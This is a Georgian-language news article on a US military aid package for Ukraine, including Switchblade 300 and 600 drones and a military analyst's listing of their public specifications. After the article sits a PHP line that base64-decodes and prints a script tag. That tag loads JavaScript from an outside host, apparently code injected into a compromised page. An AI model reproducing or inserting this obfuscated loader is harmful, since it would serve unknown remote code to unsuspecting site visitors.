celsiusi
ავერსი შნაიდერი
დღეს, აშშ-ის პრეზიდენტმა ჯო ბაიდენმა უკრაინისთვის 800 მილიონი დოლარის ოდენობით დამატებითი დახმარების შესახებ განაცხადა. 
 
„ეს აღჭურვილობის პირდაპირი გადაცემაა ჩვენი თავდაცვის სამინისტროს მიერ უკრაინელი სამხედროებისთვის, რათა დაეხმაროს მათ ამ შემოჭრის წინააღმდეგ. მადლობას ვუხდი კონგრესს ამ სახსრების გამოყოფისთვის. ეს ახალი პაკეტი თავისთავად უკრაინას უპრეცედენტო დახმარებას გაუწევს. ის შეიცავს: 800 საზენიტო სისტემას, რათა უკრაინელმა სამხედროებმა შეძლონ თვითმფრინავები და ვერტმფრენები მოიგერიონ, რომლებიც თავს ესხმიან მათ ხალხს უკრაინის საჰაერო სივრციდან“ , - განაცხადა პრეზიდენტმა.
 
აღსანიშნავია, რომ  კონგრესმენის მაიკ მაქკოლის განცხადებით, ამერიკის შეერთებული შტატები უკრაინას გადასცემს Switchblade დრონებს. ინფორმაციას გამოცემა Politico-ს ავრცელებს.
 
გამოცემის ცნობით, ამ ეტაპზე საუბარია უკრაინისთვის 100 დრონის გადაცემაზე, რომელიც მანამდე ჯო ბაიდენმა დააანონსა, კონგრესმენმა კი დააზუსტა, რომ სწორედ Switchblade დრონებზეა ლაპარაკი.
 
აღნიშნულ ფაქტს, სოციალურ ქსელში ეხმაურება ქართველი სამხედრო ანალიტიკოსი, შეიარაღების სპეციალისტი გიგა ინაშვილი და განმარტავს, თუ რა ტიპის შეიარაღებაზეა საუბარი. 
 
"ამერიკული "კამიკაძე" დრონები, საუბარია Switchblade 300 და Switchblade 600 ტიპის ბარაჟირებად კამიკაძე დრონებზე, რომელიც შემუშავებულია და იწარმოება კომპანია AeroVironment-ის მიერ 2011 წლიდან. შეიარაღებაში აქვთ აშშ-ის საზღვაო ქვითთა კორპუსს, არმიას და სპეციალური ოპერაციების სარდლობას (USSOCOM) დაქვემდებარებულ ყველა დაჯგუფებას.
1)  Switchblade 300 - მცირე ზომის, ტუბუსიდან გასაშვები ტაქტიკური, 10 კმ-მდე მოქმედი კამიკაძე დრონი. განკუთვნილია შეუჯავშნავი სამიზნეების გასანადგურებლად. მისი მსხვრევადი ფეთქებადი მუხტი ექვივალენტურია ლულისქვეშა 40 მმ მსხვრევადი გასროლისა. 
სიგრძე - 610 მმ 
მასა - 2,5 კგ 
ფრენის ხანგრძლივობა-15 წთ
ფრენის მანძილი - 10 კმ
ფრენის სიჩქარე - 100 კმ/სთ
სამიზნეზე პიკირების სიჩქარე - 160 კმ/სთ. 
2)  Switchblade 600 - შედარებით უფრო დიდი ზომის, ასევე ტუბუსიდან გასაშვები ტაქტიკური კამიკაძე დრონი. განკუთვნილია ძირითადად ტანკების გასანადგურებლად, რისთვისაც აქვს მსხვრევად-კუმულაციური მუხტი, რომლის ჯავშანგამტანობაც  ანალოგიურია "ჯაველინის" ტიპის რაკეტის კუმულაციური მუხტის შესაძლებლობებისა. (600 მმ-მდე) 
სიგრძე - 1300 მმ 
მასა - 22,7 კგ 
ფრენის ხანგრძლივობა-20/40 წთ
ფრენის მანძილი - 40 / 80 კმ
ფრენის სიჩქარე - 112 კმ/სთ
სამიზნეზე პიკირების სიჩქარე - 190 კმ/სთ." – წერს სამხედრო ანალიტიკოსი. 
1277
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");